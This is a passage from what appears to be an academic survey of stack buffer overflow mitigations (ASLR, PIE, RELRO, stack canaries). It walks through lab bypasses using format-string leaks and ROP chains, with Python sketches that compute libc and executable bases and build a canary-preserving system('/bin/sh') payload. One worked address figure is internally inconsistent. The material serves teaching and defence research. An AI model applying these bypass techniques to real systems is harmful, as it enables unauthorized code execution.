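def resolve(leaked_puts):
    """Derive the randomized libc base and the addresses built on top of it."""
    libc_base = leaked_puts - PUTS_OFFSET
    return libc_base, libc_base + SYSTEM_OFFSET, libc_base + BINSH_OFFSET

# Hypothetical leak as it might arrive from the target process.
leak = parse_leak(b"\xc0\x09\x28\xf7\xff\x7f\n")
libc_base, system_addr, binsh_addr = resolve(leak)
```

A quick sanity check on such a computation is that the resulting libc base should be page aligned, that is, its lowest 12 bits should be zero.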

Protecting the ELF Binaries
We have already seen in the previous section that ASLR provides randomization-based protection against ROP-like attacks. However, it has limitations and can be bypassed with some effort. Therefore, to provide more robust protection, other mitigations exist, including Position Independent Executable (PIE) and Relocation Read-Only (RELRO), that harden the binaries themselves.

Position Independent Executable (PIE)
Position Independent Code (PIC) is machine code that executes correctly regardless of the address at which it is placed in main memory. In general, shared libraries are compiled as PIC so that they can be shared by several processes independently of one another. This facilitates the implementation of per-process randomization via ASLR, since PIC libraries can be loaded at different addresses in each process. Unlike absolute code, which must be loaded at a specific memory location, PIC can be loaded at any memory location without alteration. Code that uses absolute addresses executes faster than code that uses relative addressing; however, the difference is insignificant on modern processors. Position-independent code is therefore easily randomized.
A binary that the compiler generates as position independent code is known as a Position Independent Executable (PIE) [26]. It allows the sections of the executable binary to be loaded at random base addresses. PIE applies to the executable the same randomization strategy that is used for shared libraries, which makes exploitation more difficult for attackers. If a binary is compiled as a Position Independent Executable, the main binary (.text, .plt, .got, .rodata) is also randomized. PIE thus complements ASLR in preventing attacks. Mac OS X 10.7, iOS 4.3, and their later versions provide full support for PIE executables. PIE makes it more difficult for adversaries to guess the addresses of code residing in the main executable, just as ASLR does for shared library code used in code reuse attacks. The -pie option is used when compiling a program with GCC to produce a position independent executable.
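Whether a binary was built as PIE can be estimated from its ELF header, because a PIE is recorded with the ELF type ET_DYN rather than ET_EXEC. The following sketch reads only that field; it is a rough heuristic (shared libraries are ET_DYN as well), and the fake_header helper is a hypothetical aid for demonstration, not part of any tool.

```python
import struct

ET_EXEC = 2   # executable linked for a fixed load address
ET_DYN = 3    # shared object or position independent executable

def elf_type(header):
    """Return the e_type field from the first bytes of an ELF file."""
    if header[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    # e_ident[EI_DATA] is byte 5: 1 means little-endian, 2 means big-endian.
    endian = "<" if header[5] == 1 else ">"
    # e_type is a 16-bit field that directly follows the 16-byte e_ident array.
    return struct.unpack_from(endian + "H", header, 16)[0]

def looks_like_pie(header):
    """Heuristic: ET_DYN suggests PIE when the file is a main executable."""
    return elf_type(header) == ET_DYN

def fake_header(e_type):
    """Build a synthetic 64-bit little-endian header prefix for demonstration."""
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + bytes(8)
    return ident + struct.pack("<H", e_type)
```

For a real file, the first 18 bytes read in binary mode would be passed to looks_like_pie in place of the synthetic header.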

Relocation Read-Only (RELRO)
Several other mechanisms have been introduced to harden binary executables, and one of them is Relocation Read-Only (RELRO). As we have already seen, the Global Offset Table (GOT) is used to resolve dynamically linked functions of shared libraries. The Procedure Linkage Table (PLT) resides in the .plt section and contains stubs that jump through the GOT [49]; the GOT entries used by these stubs reside in the .got.plt section. When a shared library function is called for the very first time, its GOT entry points back into the PLT, and a call is made to the dynamic linker, which finds the actual address of that function. After the address of the function is found, it is written to the GOT. When the call is made a second time, the GOT already contains the address. This is known as "lazy binding". The important points are that the PLT must be at a fixed offset from the .text section, the GOT must be at a known location because it contains information required by the program, and the GOT must be writable for lazy binding to work.
Since the GOT is writable and resides at a fixed location, it can be exploited during buffer overflow attacks. To prevent this, all the addresses must be resolved at program start-up and the GOT must then be marked read-only. RELRO [49] is a mitigation technique that, in general, makes the Global Offset Table read-only so that GOT overwriting techniques cannot be used during buffer overflow exploitation. It has two levels of protection: Partial RELRO and Full RELRO [50]. Partial RELRO makes the .got section read-only but leaves the .got.plt section writable, so GOT overwriting is still possible. Full RELRO makes the entire GOT read-only, including the .got.plt section, so no GOT overwriting technique can succeed.

Step by Step Procedure of Bypassing PIE and RELRO Mitigations
Figure 22 shows the flow of the strategy that we used to bypass PIE and RELRO. Figure 23 shows the vulnerable program, which has a format string vulnerability (printf) and a buffer overflow vulnerability (getMessage). We need an information leak from the binary, and to achieve that goal we take advantage of the format string vulnerability.
First of all, the vulnerable program is compiled with PIE and RELRO enabled, as shown in Figure 24. ASLR is also enabled. We can verify the enabled mitigations using the checksec utility. The next step is to leak information by exploiting the format string vulnerability. We achieve this by loading the program in gdb and passing a large number of format specifiers as input, which leaks several memory addresses, as shown in Figure 24. We then look at the memory map of the program using the vmmap command and compare its ranges with the leaked addresses. On closer inspection, we notice that the 33rd leaked address lies in the executable portion of the vulnerable binary (0x0000555555555000 to 0x0000555555556000). We can verify this by entering %33$lx as input to the program, as shown in Figure 24. In our case, the leaked address is 0x0000555555555060 and the executable base address is 0x0000555555555000, so subtracting them gives 0x60. If we now subtract this 0x60 from the leaked address (0x00005555555550a0), we obtain the randomized executable base address, which can be used to find the addresses of other functions. The first part of the exploit, shown in Figure 25, contains all the steps performed above to leak information using the format string vulnerability.
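The base-address calculation can be written out as a short sketch. The two gdb values are the ones quoted in the text; the run-time leak string is a hypothetical example of what %33$lx might print in a randomized run.

```python
# Values observed in gdb, as quoted in the text.
GDB_LEAK = 0x0000555555555060
GDB_BASE = 0x0000555555555000
LEAK_OFFSET = GDB_LEAK - GDB_BASE   # distance of the leaked pointer from the base

def parse_format_leak(output):
    """Parse the hexadecimal text printed by a %33$lx format specifier."""
    return int(output.strip(), 16)

def executable_base(leaked):
    """Subtract the known offset to recover the randomized executable base."""
    base = leaked - LEAK_OFFSET
    if base & 0xfff:
        # A mapping always starts on a page boundary, so this signals a bad leak.
        raise ValueError("computed base is not page aligned")
    return base

# Hypothetical leak from a randomized run (an assumption for illustration).
runtime_leak = parse_format_leak("55d0c1a3b060\n")
runtime_base = executable_base(runtime_leak)
```

The alignment check is a cheap guard: if the wrong stack slot was read, the subtraction almost never yields a page-aligned value.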

Phase 2:
The second part of the exploit is shown in Figure 26. To accomplish this part, we need to calculate the addresses of _start, the pop rdi gadget, and the pop rsi gadget after randomization. For this purpose, we first find the offset of each function and gadget from the executable base address found in the first phase. For example, to calculate the offset of the pop rdi gadget, we first find its address in the binary using the asmsearch utility and then subtract the executable base address from it. We do the same for every address to obtain the offsets of all the functions and gadgets. We then add each offset to the randomized executable base address, as highlighted in the figure, which gives the actual addresses of the functions and gadgets. Executing the exploit then leaks the address of printf.
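The rebasing of functions and gadgets described in this phase amounts to one subtraction and one addition per address. In the sketch below, the base observed in gdb is taken from the text, whereas the individual addresses of _start and the gadgets, as well as the randomized base, are hypothetical.

```python
GDB_BASE = 0x0000555555555000   # executable base observed in gdb (from the text)

# Hypothetical addresses as a gadget search in gdb might report them.
GDB_ADDRESSES = {
    "_start": 0x0000555555555080,
    "pop_rdi": 0x00005555555552ab,
    "pop_rsi": 0x00005555555552a9,
}

def offsets_from_base(addresses, base):
    """Offset of every function or gadget from the executable base."""
    return {name: addr - base for name, addr in addresses.items()}

def rebase(offsets, randomized_base):
    """Actual run-time addresses once the randomized base is known."""
    return {name: randomized_base + off for name, off in offsets.items()}

OFFSETS = offsets_from_base(GDB_ADDRESSES, GDB_BASE)
# Hypothetical randomized base, e.g. recovered from a format string leak.
runtime = rebase(OFFSETS, 0x55d0c1a3b000)
```

Because the offsets are fixed at link time, they only need to be computed once per binary; only the base changes between runs.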

Phase 3:
The final step is to obtain the actual addresses of system and /bin/sh after randomization. We accomplish this by using the printf address leaked in Phase 2. We find the offset of printf in libc using the readelf command, as shown in Figure 27, and subtract it from the leaked printf address to determine the actual randomization of the addresses, as highlighted in Figure 27, which shows the final part of the exploit. We also find the offsets of system and /bin/sh as in Section 4.2 (Step by Step Procedure of Bypassing ASLR Mitigation) and add the calculated difference to these offsets, as highlighted in Figure 27, to obtain their addresses after randomization. Executing the script spawns a shell.

Compiler Based Mitigation Techniques
In the previous sections, we discussed techniques supported at the hardware and operating system levels to mitigate buffer overflow attacks. We have seen that, after many years of development, those mitigations can still be bypassed. In this section, we discuss the compiler-based countermeasures that have been proposed to automatically detect and prevent buffer overflow attacks. Table 6 summarizes these protection mechanisms. Ref. [51] presented the ProPolice compiler extension, also called the Stack Smashing Protector (SSP), an approach that improves on StackGuard. SSP rearranges the memory layout to place pointers and function arguments below local buffers and arrays in stack memory, which protects against code-injection and code-reuse attacks. StackShield is a GNU GCC extension [52] that adds instructions to the program during compilation to maintain a duplicate stack in a different segment, to which return addresses are copied. It protects against stack smashing attacks because an attacker cannot overwrite both copies of a return address through a single vulnerability. Ref. [53] proposed Return Address Defender (RAD), a patch to the GCC compiler that adds safety code to create a protected area for copies of return addresses. It helps the administrator detect the attack and catch the intruder by sending a real-time message and email. The tool named Address Sanitizer has been implemented in GCC by Google to detect memory errors [54]. It is used to detect out-of-bounds accesses, use-after-free errors, and memory leaks. Ref. [55] presented a compiler approach named StackGuard, or Stack Canary.

Stack Canary
A standard stack-based overflow attack changes the return address and alters the application's control flow, typically through code injection. Various protection and detection techniques have been proposed to mitigate buffer overflow attacks, and one of them is the Stack Canary. The idea of the stack canary was first implemented by [56], and the proposed technique is known as StackGuard. It is a GCC compiler extension that tries to reduce the probability of stack smashing attacks. StackGuard prevents the return address from being changed undetected by inserting a "canary" next to the return address. When the function body finishes executing, and before control jumps to the function's return address, StackGuard checks that the canary has not been altered by comparing it with a copy saved elsewhere. This mechanism assumes that if the canary is intact, the return address has not been changed. In a standard stack smashing attack, the attacker overwrites bytes linearly, sequentially, and in ascending address order. Under that strategy, it is almost impossible to change the return address without overwriting the canary. Figure 28 shows the stack layout of a program compiled with a stack canary.
We have already seen that when a program makes a function call, a stack frame is created on the stack by the procedure prolog (Figure 28), and when control returns, the procedure epilog is performed (Figure 28). The function prolog of a program compiled with StackGuard is different: it first pushes the canary onto the stack and then proceeds with the standard prolog. The epilog checks whether the canary is unchanged and terminates the process with an error message if a change has occurred. Figure 29 shows the disassembly of the same copy_buff function whose disassembly was shown in Figure 4, but this time the program was compiled with a stack canary.
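The prolog and epilog behaviour described above can be modelled with a toy stack frame. The sketch below is a simulation in Python, not compiler output: the class ToyFrame, the 16-byte buffer size, and the frame layout (buffer, canary, saved frame pointer, return address) are assumptions made for illustration.

```python
import os

BUF_SIZE = 16   # size of the local buffer in this toy frame (an assumption)

class ToyFrame:
    """Toy frame laid out as: buffer | canary | saved rbp | return address."""

    def __init__(self, return_address, canary=None):
        # The reference copy of the canary is kept outside the frame.
        self.reference = canary if canary is not None else os.urandom(8)
        self.memory = bytearray(BUF_SIZE)                  # local buffer
        self.memory += self.reference                      # canary set by the prolog
        self.memory += bytes(8)                            # saved frame pointer
        self.memory += return_address.to_bytes(8, "little")

    def unsafe_copy(self, data):
        """Copy into the buffer without any bounds check."""
        self.memory[:len(data)] = data

    def canary_intact(self):
        """The comparison the epilog performs before returning."""
        return bytes(self.memory[BUF_SIZE:BUF_SIZE + 8]) == self.reference

    def saved_return_address(self):
        return int.from_bytes(self.memory[BUF_SIZE + 16:BUF_SIZE + 24], "little")
```

Writing 5 bytes into such a frame leaves canary_intact() true, whereas a linear write of 40 bytes reaches the return address only by passing over the canary, so the check fails before the corrupted return address would be used.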
StackGuard was first implemented in 1997 as an extension of GCC 2.7 for Intel x86. On Linux, it was maintained from 1998 to 2003 in the Immunix Linux distribution. GCC patches for stack protection were introduced by IBM from 2001 onwards [57]. Red Hat engineers, after re-implementing the stack protector in GCC 4.1, introduced the -fstack-protector flag, which provides protection only for specific functions. In GCC version 4.9, Google implemented the -fstack-protector-strong flag to provide more robust security. Since Ubuntu 6.10, most packages have used the -fstack-protector flag. Since May 2014, all Arch Linux packages have been compiled with the -fstack-protector-strong flag. Since Fedora 20, all Fedora packages have been compiled with -fstack-protector-strong.
In the initial implementations of StackGuard, the canary was a randomly generated 32-bit number. There are other types of canaries as well. For example, the constant value 0x00000000 was used as a NULL canary in early StackGuard versions. An XOR random canary is a random number generated at run time that is XORed with the return address before being saved on the stack. The constant 0x000aff0d, named the Terminator Canary, was also used as a canary in StackGuard version 2.0.1. It was so called because it contains the null byte (0x00), line feed (0x0a), EOF (0xff), and carriage return (0x0d) characters, which terminate functions such as strcpy(), gets(), and other libc string copying functions. However, StackGuard also has limitations and has been bypassed. In the following section, we discuss an existing method for bypassing the Stack Canary along with other mitigations such as PIE, ASLR, and NX.
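Why the terminator canary frustrates string-copying functions can be seen in a small model. The functions strcpy_like and gets_like below are simplified Python stand-ins written for this illustration, not the libc routines; they only reproduce the rule that copying stops at a NUL byte or at a newline, respectively.

```python
# The constant 0x000aff0d as it lies in little-endian memory: 0d ff 0a 00.
TERMINATOR_CANARY = (0x000aff0d).to_bytes(4, "little")

def strcpy_like(src):
    """Model of strcpy: copy up to the first NUL byte, then write a NUL."""
    end = src.find(b"\x00")
    copied = src if end == -1 else src[:end]
    return copied + b"\x00"

def gets_like(src):
    """Model of gets: copy up to the first newline, then write a NUL."""
    end = src.find(b"\n")
    copied = src if end == -1 else src[:end]
    return copied + b"\x00"

# An attacker who tries to rewrite the canary faithfully and continue past it:
attempt = b"A" * 16 + TERMINATOR_CANARY + b"B" * 8

via_strcpy = strcpy_like(attempt)   # stops at the canary's 0x00 byte
via_gets = gets_like(attempt)       # stops at the canary's 0x0a byte
```

In both cases the trailing B bytes, which stand for a forged return address, are never copied: an input that reproduces the canary terminates the copy, and an input that does not reproduce it corrupts the canary.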

Step by Step Procedure of Bypassing Canary, PIE, ASLR, and NX Mitigation
We used an existing technique to bypass the most significant mitigation techniques, including Canary, ASLR, PIE, and NX bit. Figure 30 shows the strategy that we used to bypass all the mitigations, including the stack canary.
Phase 1: Figure 31 shows the vulnerable program used for exploitation. It has two vulnerabilities: a printf call that is used to exploit a format string vulnerability for information leakage, and an fgets call that is vulnerable to buffer overflow. First of all, the vulnerable program is compiled with all the mitigations (NX, ASLR, Canary, PIE) enabled, as shown in Figure 32. We can check the enabled mitigations using the checksec utility. The next step is to exploit the format string vulnerability to reveal memory locations in our vulnerable program. For that purpose we used a Python script, shown in Figure 32, that prints the format string output multiple times for information leakage, as also shown in the figure. The values starting with 7f, such as format string outputs 3 and 5, correspond to libc addresses, which can later be used to bypass ASLR. The value found at format string output 9 may represent the canary value.
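Sorting the leaked values into candidate libc addresses and candidate canaries can be sketched as follows. The classification rules are heuristics assumed for this example (a 48-bit value whose top byte is 0x7f, and a 64-bit value whose lowest byte is zero, as glibc canaries on x86-64 have), and the sample output string is hypothetical.

```python
def build_probe(count):
    """Format string that prints `count` stack words as hex, separated by dots."""
    return ".".join("%{}$lx".format(i) for i in range(1, count + 1))

def parse_outputs(text):
    """Map each 1-based output position to the integer value that was printed."""
    tokens = text.strip().split(".")
    return {i: int(tok, 16) for i, tok in enumerate(tokens, start=1)}

def classify(value):
    """Heuristic labels only; a 7f value may also be a stack address."""
    if value >> 40 == 0x7f:
        return "7f-address"
    if value & 0xff == 0 and value >> 48 != 0:
        return "canary-like"
    return "other"

# Hypothetical program output for a nine-specifier probe.
sample = "1.0.7ffff7af4081.0.7ffff7fdc500.0.1.0.5a1c7e3f9b2d4c00"
labels = {i: classify(v) for i, v in parse_outputs(sample).items()}
```

Such labels only narrow down the candidates; confirming which value really is the canary still requires the comparison in gdb described in the next phase.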
Phase 2: The next step is to use the leaked information to obtain the libc offset after randomization and the canary value. Since format string output 3 represents a libc address, it can be used to find the libc offset. For example, we ran our program in gdb and supplied the format specifier for output 3 as input, which returns a randomized libc address, as shown in Figure 33. The vmmap command can be used to display the memory mapping of libc for the current process, as also shown in Figure 33. The libc offset is the difference between the leaked libc address and the starting address of the libc memory mapping, as shown in Figure 33. This offset can be subtracted from the libc address leaked at the same position in any run to obtain the base address of libc after randomization. The next step is to determine the canary value.
When we disassemble our main() function in gdb, we can see that the canary is stored in RCX and is checked after the last call to fgets(), as shown in Figure 33 (only the required part of the disassembly is shown). We also know that outputs 6 and 9 of the format string might correspond to the stack canary. We ran our program in gdb and supplied the format specifier for output 9 as input, which returned a value. After that, we ran our program with a breakpoint at 0x5555555551f9, checked the value of RCX, and compared it with the format string value, which identified the original stack canary, as shown in Figure 33.
The next step is to determine the size of the input string needed to overwrite the stack canary and the return address. To see after how many characters the canary should be placed, we create a pattern and pass it as input to our program in gdb. Using the value of the RCX register, we obtain the offset that gives the number of As to be filled in before the canary is overwritten; in our case, it is 24. After the canary comes the saved rbp, which occupies 8 bytes. Since the saved return address (rip) lies 8 bytes beyond the canary, we place 8 As after the canary before overwriting the return address.
Phase 3: The final step is to place the ROP gadgets in the payload along with the previously found addresses. That is, the payload calls the system() function and passes /bin/sh as its argument via the "pop rdi; ret" gadget. We created a script file, shown in Figure 34, that combines all the work explained above to obtain the leaked addresses, as highlighted in the figure, and finally sends the payload to our vulnerable program. Running that Python script spawns a shell, as also shown in Figure 34.
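The shape of the final payload follows directly from the offsets found in Phase 2: 24 filler bytes, the leaked canary, 8 bytes covering the saved rbp, and then the ROP chain. The sketch below assembles that layout; it is not the script of Figure 34, and the canary, libc base, gadget address, and libc offsets used in the example call are all hypothetical.

```python
import struct

CANARY_OFFSET = 24   # filler bytes before the canary (from the text)
RBP_SIZE = 8         # saved rbp between the canary and the return address

def p64(value):
    """Pack an integer as an 8-byte little-endian word."""
    return struct.pack("<Q", value)

def build_payload(canary, pop_rdi, binsh_addr, system_addr):
    """Filler, intact canary, saved rbp filler, then system("/bin/sh")."""
    payload = b"A" * CANARY_OFFSET
    payload += p64(canary)         # rewrite the canary with its own value
    payload += b"A" * RBP_SIZE     # overwrite the saved rbp
    payload += p64(pop_rdi)        # gadget: pop rdi; ret
    payload += p64(binsh_addr)     # argument for system()
    payload += p64(system_addr)    # call system()
    return payload

# Hypothetical leaked and derived values, for illustration only.
libc_base = 0x7ffff7200000
final = build_payload(
    canary=0x5a1c7e3f9b2d4c00,
    pop_rdi=libc_base + 0x2155f,
    binsh_addr=libc_base + 0x1b3e9a,
    system_addr=libc_base + 0x4f440,
)
```

Since the canary is written back with its leaked value, the epilog check passes and control reaches the first gadget at offset 40 of the payload.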

Conclusions
This study presents a detailed literature review of one of the most prevalent attacks, the buffer overflow, with a focus on the stack-based buffer overflow. A number of attacks can be mounted through a stack-based buffer overflow, such as stack smashing using code injection. To prevent this, the NX bit was introduced to mark memory regions as non-executable, but attackers still found a way around it. For this purpose, attackers adopted Return-Oriented Programming (ROP), an advanced form of code-reuse attack that can bypass the NX bit by using ROP gadgets already present in the address space of the process. ASLR randomizes the base addresses of the stack, heap, shared libraries, and binaries to protect against ROP attacks. However, even a small information leak is enough to bypass ASLR. PIE and RELRO are used to harden binaries against information leakage and ROP attacks, but they can also be bypassed, as we have done in the current study. The stack canary is a robust protection mechanism that protects against typical stack smashing attacks. NX bit, ASLR, PIE, RELRO, and Stack Canary are well-known mitigation techniques used by many widely deployed operating systems. Unfortunately, even after so many years, these mitigations are not completely foolproof and can still be bypassed with some effort. This is the main reason why buffer overflow remains an ever-present threat.
Several points require the attention of the developer community. One of them is advanced exploitation methods: the exploits used in the current study are customized and valid only for a single instance of the vulnerable program. Thus, there is a need to focus on more advanced exploitation methods, such as Blind ROP (BROP). Another direction is to mature the existing mitigation techniques or to propose new mitigation techniques that improve on them. Various automated tools exist for the automatic detection and prevention of buffer overflows, but an optimal approach is still missing.
Funding: The authors are especially thankful to Prince Sultan University for paying the Article Processing Charges (APC) of this publication.